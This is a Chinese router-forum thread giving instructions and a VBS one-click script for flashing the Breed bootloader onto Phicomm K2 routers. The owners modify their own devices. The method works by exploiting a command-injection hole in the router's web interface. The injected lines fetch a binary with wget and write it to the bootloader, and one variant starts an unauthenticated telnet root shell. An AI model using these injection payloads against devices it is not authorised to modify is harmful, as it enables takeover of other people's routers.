找回密码
 立即注册

QQ登录

只需一步,快速开始

搜索
广告投放联系QQ68610888
查看: 478302|回复: 2274

【刷机必读】斐讯K2刷breed的安全方法及开源一键刷机脚本和终极大法【2017-04-24】

 火... [复制链接]
发表于 2017-3-5 10:32 | 显示全部楼层 |阅读模式
本帖最后由 abccba94 于 2017-6-7 13:07 编辑

注:此贴发布较早,目前有更加简便的方法来刷breed,就是直接在官方版本上升级163 V1.4定制版本,里面包含了breed
       支持所有官方版本,包括最新的K2_22.5.10.176和22.5.11.5等,不用任何工具,如提示非法固件,请恢复出厂后再试
----------------------------------------------------------------------------------------------------------------------------------------------------


如果你是小白或者不想听我啰嗦,只想痛快的、安全的一键刷机,你可以往下拉至蓝色字体部分;终极大法请拉至最后

如果你想知道来龙去脉或者想思考点东西,那就听我娓娓道来

----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
斐迅K2刷机的最大风险是什么?答案是刷breed或uboot(bootloader)

bootloader相当于计算机的bios,只要bios不坏,你可以通过U盘、光驱来重装系统,如果bios坏了,那就成砖了,动用编程器不是一般用户能玩转的。

K2也是一样,只要bootloader(不管是breed还是官方的uboot)没有损坏,都可以有办法挽救回来,如果bootloader坏了,就等着返厂吧...

同时,刷breed也是你刷机的第一步,只有有了这个第三方的bios,你才能在众多第三方固件中自由翱翔、任意挑选,下面我们来看看如何在官方版本上刷breed。

目前刷breed的通常的方法是利用【WEB漏洞】,但是有不少用户利用此方法刷breed刷成砖了,原因是breed文件下载环节没有文件校验,如果下载失败或错误就必然成砖了。

我每次通过WEB漏洞来刷breed时也总是提心吊胆,生怕出现万一的情况,于是我写了下面的脚本,对下载的breed文件进行MD5校验后再写入。

以后刷写breed,利用定时重启的WEB漏洞输入如下语句就可以更加安全的刷写(由于新breed的官方下载网站采用了https,而K2的wget不支持https,因此需从其他http网站下载breed):

05 |wget -T 10 http://breed.hackpascal.net/breed-mt7620-phicomm-psg1208.bin -O /tmp/breed.bin && [ -f /tmp/breed.bin ] && [ $(md5sum /tmp/breed.bin|cut -d ' ' -f1) = 29bb021be2cc037ca4d8daa2d4b90a59 ] && mtd unlock Bootloader&&mtd -r write /tmp/breed.bin Bootloader

  1. 05 |wget -T 10 http://iytc.net/tools/breed0416.bin -O /tmp/breed.bin && [ -f /tmp/breed.bin ] && [ $(md5sum /tmp/breed.bin|cut -d ' ' -f1) = 164cb272152740b164b9caab84a33d0a ] && mtd unlock Bootloader&&mtd -r write /tmp/breed.bin Bootloader
复制代码


注:这个是一行语句,不要分行,拷贝的时候不要拷贝错了(拷漏字符)

图示:

如果执行成功,K2会自动复位,指示灯变红;如果失败,K2不会复位,也不会损坏uboot。
如果你执行了上述语句后K2没有复位,请检查你的操作步骤是否执行正确(注意输入语句后需重新选择05选项,可以看到"05"后的新增语句)、K2是否能够正确上网等。

上面语句比较复杂,我们把它展开解释一下,有兴趣者可供参考:
  1. #K2能正常联网,下载breed,设置10秒超时
  2. wget -T 10 http://iytc.net/breed0416.bin -O /tmp/breed.bin

  3. #判断是否有下载文件
  4. if [ -f "/tmp/breed.bin" ] ;then
  5. vmd5=`md5sum /tmp/breed.bin|cut -d ' ' -f1 `
  6. #判断下载文件的MD5值是否正确
  7. if [ "$vmd5" = "164cb272152740b164b9caab84a33d0a" ] ;then
  8.   #如果正确则开始刷写breed
  9.   mtd unlock Bootloader
  10.   mtd -r write /tmp/breed.bin Bootloader
  11. fi
  12. fi
复制代码


后续如果breed版本更新了,你只要自行修改下载地址(http://breed.hackpascal.net/breed-mt7620-phicomm-psg1208.bin)及MD5值(29bb021be2cc037ca4d8daa2d4b90a59 )就可以了



【一键刷机脚本】
--------------------------------------------------------------------------------------------------------------------------------------------------------
你是不是觉得上面的步骤很麻烦,有时我自己也觉得麻烦,那我们再来做一个一键刷机的脚本。
我们用vbs脚本来模拟K2网页的登录以及WEB漏洞语句的输入过程。

在执行脚本前,你应该先选好第三方固件【参考

其次请保证你的K2能够正常上网,K2的管理页面地址设置为缺省的http://192.168.2.1,登录密码设置为"admin",计算机通过wifi或网线能够正常连接管理页面。

最后,下载并解压下面的脚本文件,然后在计算机上双击执行,会自动弹出IE界面,然后自动刷机,无需人工操作:

0424更新脚本(breed更新为20170416版本):


如果执行成功,K2会自动复位,指示灯变红,表示最新的breed已经刷入;
如果失败,K2不会复位,也不会损坏uboot,但是强烈建议如果失败在执行脚本后30秒之内不要进行任何操作(比如重新执行脚本、断电、复位等)。

注:所有版本都可以直接刷,不需要降级什么的操作,刷好后直接用breed刷入第三方固件。

breed进入方式:电脑连接LAN口自动获取 IP 地址,按住K2复位键再通电,持续按住几秒,然后电脑访问http://192.168.1.1即可在WEB刷第三方固件

刷之前建议你先到“固件备份”中保存所有的东西到计算机上,以免不时之需。

这是个开源的脚本文件,你可以用任何文本编辑器打开并修改,比如你可以配置缺省的登录密码及K2地址:
  1. password = "admin" '登录密码
  2. k2_url = "http://192.168.2.1/" '登录网址
复制代码


其实这个脚本的作用不只刷breed这么简单,事实上,你可以把它改成一键执行K2上的任何命令,比如一键开启telnet,只需修改mcmd语句:
  1. mcmd="05 | /usr/sbin/telnetd -l /bin/login.sh"
复制代码


如上一键脚本在win7、win10,K2 V22.4.5.42、V22.5.9.163版本测试通过,应该适用所有存在此漏洞的版本。

如果你成功了,请反馈一下所用系统及K2版本,如果失败了,也请反馈一下,以便于脚本的改进,造福更多网友!

开源的好处是公开、透明、众人监督和完善,免除一些不必要的担心,人人为我、我为人人!

如果你使用脚本遇到问题或者对改进脚本有任何建议,请加入breed一键刷机脚本交流QQ群:

放心,这是安全刷机,只要你不在刷的时候断电或复位,不会损坏你的bootloader的,最后,祝你玩机愉快!!


【适用性反馈记录】
--------------------------------------------------------------------------------------------------------------------------------------------------------
系统:win7、win10
硬件版本:K1、K2 A2、A6 (670楼反馈可用)
软件版本:K2 V22.4.6.3、V22.4.5.42(564楼反馈可用)、V22.5.9.163(596、648楼反馈可用)、K1 V22.4.2.15
注:只要支持此WEB漏洞并且页面控件ID一样(不一样可以自己修改),不分K1、K2,不分软、硬件版本,全部支持(因为它们的breed都是同一个)
即使不支持,执行失败也不会有任何影响。如果你当前的版本不支持,请升级至支持的版本后再执行脚本。



【排错处理】
--------------------------------------------------------------------------------------------------------------------------------------------------------
如果你运行脚本出现错误,请设置windows的“用户账户控制设置”为“从不通知”:


另有网友反馈先打开IE,再执行脚本会避免一些错误提示

如果你当前K2的版本不支持WEB漏洞,请先升级到支持web漏洞的官方版本,比如V22.4.5.42、V22.5.9.163等,再执行脚本

如果排错处理后,一键脚本还是执行出错,请换一台计算机执行

如果还是不行,不用伤心,在浏览器中用WEB漏洞输入安全的刷机语句即可,我们以前一直也是这样做的



【终极大法】
--------------------------------------------------------------------------------------------------------------------------------------------------------
其实上面的步骤已经够简单了,但是有很多网友反馈脚本执行出现错误,好吧,我们现在请出终极武器-配置文件恢复法。

在很久很久以前,配置文件恢复法是很好使的,其原理是覆盖现有的配置,尤其是自启动文件,添加进自己想要执行命令,比如刷入breed,不过后来斐讯迅速加入了配置文件的加密。

有加密就有解密,经过我花了一天多时间的努力,加密算法已经被破解【参考】,现在你可以通过网页来下载你K2的breed配置文件,只需在配置恢复界面导入即可自动刷入breed。

【步骤】
1、访问如下网址,输入WAN口MAC地址,自动生成配置文件
http://iytc.net/k2.php

2、在K2 WEB管理页面“高级设置”-“系统设置”-“备份恢复”界面,导入下载的配置文件,然后点击“恢复备份”按钮即可。




【说明】
1、刷入breed不会修改你当前的配置,breed配置文件中自带最新的breed程序,导入时无需联网(联网也没关系),在刷入时会进行MD5校验,保证安全。
2、恢复配置后,K2会复位两次,此时请不要断电或人工复位;
3、breed版本为20170416版本,支持163分区启动。











本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

×

点评

我的系统是win10 1703 不知道与这个有没有关系  发表于 2017-9-12 16:32
有问题刷坏了我二个k2.第一个坏掉还不知道是这个的问题。今天第二个又坏了才知道。这次买了二个k2,另外一个用别的刷breed用的好好的。症状是用了BREED之后,进breed刷完固件,一个小时后路由器驾崩,breed都进不...  发表于 2017-9-12 16:31
楼主你都担心breed文件损坏什么的,你可以直接本机上建个http server就简单多了。  发表于 2017-4-26 17:40
你的排错处理是在降低系统的安全性  发表于 2017-4-24 17:29
受用。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。  发表于 2017-3-20 21:10

评分

参与人数 64恩山币 +60 收起 理由
ohxiangzi + 1 恩山全体路由党向你学习!
Bog + 1 感谢大神、感谢大神啊、么么哒
q165375115 + 1 兄弟 iytc.net/k2.php 这个403了
ou1200 + 1 强大的恩山!(以下重复1万次)
鲜锅兔儿 + 3 支付宝已转5毛给你!
lj8033 + 1 K2 A2 软件版本号:22.4.5.42 win7 32位旗舰版 成功,感谢
qq812258731 -1 有问题刷坏了我二个k2.第一个坏掉还不知道是这个的问题。今天第二个又坏了才知道。
crazyboyshun + 1 犀利
飘朵朵 + 1 今天天气不错,适合泡妞。
依风听雨 + 1 支付宝已转500w给你! K2 A2 22.5.10.176 VBS失败,配置恢
hyhelena + 1 我来恩山就是为了看你!
qq943063692 + 1 强大的恩山!(以下重复1万次)
黯里。着迷 + 1 支付宝已转500w给你!
沙羅双樹 + 1 强大的恩山!(以下重复1万次)
as8680 -1 楼主够恶心,加群还付费
墨守成规_ + 1 切糕党手持切糕刀强势围观楼主!
dwndwn123 + 1 亲,你太牛逼了,走,我请你吃鳇鱼头去~~~
ahdszyp + 1 支付宝已转500w给你!
877812210 + 1 楼主我爱死你了!!之前用05漏洞怪不得不行,原来改https了
jjyyzz + 1 楼主威武—我就想问问挖掘机技术哪家强?
chaozhou + 1 一看就是觉得高端、大气、上档次!
BGLongLong + 1 楼主威武—我就想问问挖掘机技术哪家强?
onlyellow -1 支付宝已转500w给你!
hyfcloud + 1 我来恩山就是为了看你!
lzhsc + 1 怀揽白富美的屌丝露出了惊讶的眼神:哥,你太帅了!
洛叶缒枫 + 1 我来恩山就是为了看你!
xiangt + 1 亲,你太牛逼了,走,我请你吃鳇鱼头去~~~
武威 + 1 亲,你太牛逼了,走,我请你吃鳇鱼头去~~~
308744463 + 1 支付宝已转500w给你!
luxer + 1 楼主威武—我就想问问挖掘机技术哪家强?
享受现在 + 1 我手抖了下,加分变扣分了!
sogno + 1 我来恩山就是为了看你!
zyzhuyue + 1 支付宝已转500w给你!
SeasonLin + 1 赞一个,你是我的呕像!
在游泳的猫 + 1 支付宝已转500w给你!
dufenk + 1 支付宝已转500w给你!
夹克油 + 1 亲,你这么厉害,我想做你的经纪人!
abluns + 1 支付宝已转500w给你!
manluck + 1 一看就是觉得高端、大气、上档次!
sd-song + 1 这是要上头条的节奏
sujian42007 + 1 亲,你太牛逼了,走,我请你吃鳇鱼头去~~~
nituixian + 1 支付宝已转500w给你!
1563110261 + 1 win7无法打开 找不到程序执行 求指导
熟悉又陌生 + 1 亲,你这么厉害,我想做你的经纪人!
20263820 + 1 楼主威武—我就想问问挖掘机技术哪家强?
懒浮云 + 1 我来恩山就是为了看你!
xiaoercb + 1 支付宝已转500w给你!
Chongzi + 1 一看就是觉得高端、大气、上档次!
zbbenben + 1 亲,你太牛逼了,走,我请你吃鳇鱼头去~~~
常林 + 1 楼主威武—我就想问问挖掘机技术哪家强?
singmow + 1 我来恩山就是为了看你!
coolwjl + 1 我来恩山就是为了看你!
cixiclq + 1 亲,你太牛逼了,走,我请你吃鳇鱼头去~~~
阿非 + 1 亲,你太牛逼了,走,我请你吃鳇鱼头去~~~
huserszm + 1 支付宝已转500w给你!
潜水者 + 1 a6版本已成功用一键工具刷成功
xiaotuguo + 1 已返厂,换回来照你的试试
jieanxun + 1 有其他好的办法可以直接刷的。
xzwl1234 + 1 泥马,真给力,我要顶!
七月未央 + 1 亲,你这么厉害,我想做你的经纪人!
落雨收衫 + 1 支付宝已转500w给你!
流失 + 1 我来恩山就是为了看你!
tdcs + 1 亲,你太牛逼了,走,我请你吃鳇鱼头去~~~
zhl416 + 1 城会玩

查看全部评分

只谈技术、莫论政事!(点击见详情) | 恩山无线论坛欢迎您的来访,请互相尊重、友善交流,建议保持一颗平常心看待网友的评论,切勿过度反应。
发表于 2017-3-5 10:34 | 显示全部楼层
想看一看,思考借鉴。
只谈技术、莫论政事!(点击见详情) | 恩山无线论坛欢迎您的来访,请互相尊重、友善交流,建议保持一颗平常心看待网友的评论,切勿过度反应。
回复 支持 反对

使用道具 举报

发表于 2017-3-5 10:37 | 显示全部楼层
感谢分享,正需要
只谈技术、莫论政事!(点击见详情) | 恩山无线论坛欢迎您的来访,请互相尊重、友善交流,建议保持一颗平常心看待网友的评论,切勿过度反应。
回复 支持 反对

使用道具 举报

发表于 2017-3-5 10:42 | 显示全部楼层
感谢分享,正需要
只谈技术、莫论政事!(点击见详情) | 恩山无线论坛欢迎您的来访,请互相尊重、友善交流,建议保持一颗平常心看待网友的评论,切勿过度反应。
回复 支持 反对

使用道具 举报

发表于 2017-3-5 10:47 | 显示全部楼层
谢谢分享  思考
只谈技术、莫论政事!(点击见详情) | 恩山无线论坛欢迎您的来访,请互相尊重、友善交流,建议保持一颗平常心看待网友的评论,切勿过度反应。
回复 支持 反对

使用道具 举报

发表于 2017-3-5 10:48 | 显示全部楼层
谢谢分享啊啊啊啊
只谈技术、莫论政事!(点击见详情) | 恩山无线论坛欢迎您的来访,请互相尊重、友善交流,建议保持一颗平常心看待网友的评论,切勿过度反应。
回复 支持 反对

使用道具 举报

发表于 2017-3-5 10:49 | 显示全部楼层
感谢分享,正需要
只谈技术、莫论政事!(点击见详情) | 恩山无线论坛欢迎您的来访,请互相尊重、友善交流,建议保持一颗平常心看待网友的评论,切勿过度反应。
回复 支持 反对

使用道具 举报

发表于 2017-3-5 10:52 来自手机 | 显示全部楼层
对,这个要得!
不过不要程序本身再出问题,那就笑话了!
只谈技术、莫论政事!(点击见详情) | 恩山无线论坛欢迎您的来访,请互相尊重、友善交流,建议保持一颗平常心看待网友的评论,切勿过度反应。
回复 支持 反对

使用道具 举报

发表于 2017-3-5 10:56 | 显示全部楼层
.................................................
只谈技术、莫论政事!(点击见详情) | 恩山无线论坛欢迎您的来访,请互相尊重、友善交流,建议保持一颗平常心看待网友的评论,切勿过度反应。
回复 支持 反对

使用道具 举报

发表于 2017-3-5 10:58 来自手机 | 显示全部楼层
看看    思考思考
只谈技术、莫论政事!(点击见详情) | 恩山无线论坛欢迎您的来访,请互相尊重、友善交流,建议保持一颗平常心看待网友的评论,切勿过度反应。
回复 支持 反对

使用道具 举报

发表于 2017-3-5 11:00 来自手机 | 显示全部楼层
可以考虑一下!!!
只谈技术、莫论政事!(点击见详情) | 恩山无线论坛欢迎您的来访,请互相尊重、友善交流,建议保持一颗平常心看待网友的评论,切勿过度反应。
回复 支持 反对

使用道具 举报

发表于 2017-3-5 11:00 | 显示全部楼层
这个必须顶一下
只谈技术、莫论政事!(点击见详情) | 恩山无线论坛欢迎您的来访,请互相尊重、友善交流,建议保持一颗平常心看待网友的评论,切勿过度反应。
回复 支持 反对

使用道具 举报

发表于 2017-3-5 11:00 | 显示全部楼层

想看一看,思考借鉴。
只谈技术、莫论政事!(点击见详情) | 恩山无线论坛欢迎您的来访,请互相尊重、友善交流,建议保持一颗平常心看待网友的评论,切勿过度反应。
回复 支持 反对

使用道具 举报

发表于 2017-3-5 11:00 | 显示全部楼层
这个要思考一下~
只谈技术、莫论政事!(点击见详情) | 恩山无线论坛欢迎您的来访,请互相尊重、友善交流,建议保持一颗平常心看待网友的评论,切勿过度反应。
回复 支持 反对

使用道具 举报

发表于 2017-3-5 11:01 | 显示全部楼层

想看一看,思考借鉴
只谈技术、莫论政事!(点击见详情) | 恩山无线论坛欢迎您的来访,请互相尊重、友善交流,建议保持一颗平常心看待网友的评论,切勿过度反应。
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

关闭

欢迎大家光临恩山无线论坛上一条 /1 下一条

有疑问请添加管理员QQ86788181|手机版|小黑屋|Archiver|恩山无线论坛(常州市恩山计算机开发有限公司版权所有) ( 苏ICP备05084872号 )

GMT+8, 2024-7-23 05:04

Powered by Discuz! X3.5

© 2001-2024 Discuz! Team.

| 江苏省互联网有害信息举报中心 举报信箱:js12377 | @jischina.com.cn 举报电话:025-88802724 本站不良内容举报信箱:68610888@qq.com

快速回复 返回顶部 返回列表